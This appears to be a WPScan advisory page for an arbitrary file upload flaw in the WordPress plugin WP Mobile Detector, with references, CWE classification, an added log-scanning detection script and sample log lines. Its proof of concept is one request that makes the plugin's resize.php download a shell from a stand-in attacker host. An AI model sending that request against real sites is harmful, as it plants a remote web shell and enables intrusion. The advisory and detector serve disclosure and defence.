WP Mobile Detector <= 3.5 - Arbitrary File Upload


Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php
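
A detection sketch for the request pattern shown above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the plugin's resize.php whose src parameter points at a remote URL. The Combined Log Format layout, the function name, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the request shown on this page.
VULN_PATH = "/wp-content/plugins/wp-mobile-detector/resize.php"
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumed server-executable extensions

# Assumed log layout: Apache/nginx Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def find_remote_src_requests(lines):
    """Return one record per resize.php request whose src is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path, _, query = m["target"].partition("?")
        # Normalise the path so %-encoding or doubled slashes do not hide it.
        path = re.sub(r"/{2,}", "/", unquote(raw_path))
        if not path.endswith(VULN_PATH):
            continue
        for src in parse_qs(query).get("src", []):  # parse_qs also URL-decodes
            try:
                remote = urlsplit(src.strip())
            except ValueError:
                continue  # malformed URL in src
            if remote.scheme.lower() not in ("http", "https", "ftp") or not remote.hostname:
                continue  # local file reference, not a remote fetch
            hits.append({
                "client": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "src": src, "remote_host": remote.hostname,
                "script_ext": remote.path.lower().endswith(SCRIPT_EXTS),
            })
    return hits

# Constructed sample lines (documentation IP ranges); the first URL mirrors the page.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2016:10:15:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.7 - - [03/Jun/2016:10:15:09 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fwww.evil.com%2Fshell.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.20 - - [03/Jun/2016:10:16:40 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=/wp-content/uploads/photo.jpg HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.21 - - [03/Jun/2016:10:17:11 +0000] "GET /index.php?src=https://www.example.org/a.png HTTP/1.1" 200 812 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_remote_src_requests(SAMPLE_LOG):
        print(hit)
```

Any hit on a site that ran version 3.5 or earlier is a reason to review the installation and confirm the plugin is at 3.6 or later.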

Affects

Plugin wp-mobile-detector
fixed in version 3.6

References

URL https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
URL https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
URL https://wordpress.org/plugins/wp-mobile-detector/changelog/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 408
Verified No
WPVDB ID 8505

Timeline

Publicly Published 2016-06-03 (10 months ago)
Added 2016-06-03 (10 months ago)
Last Updated 2016-06-06 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.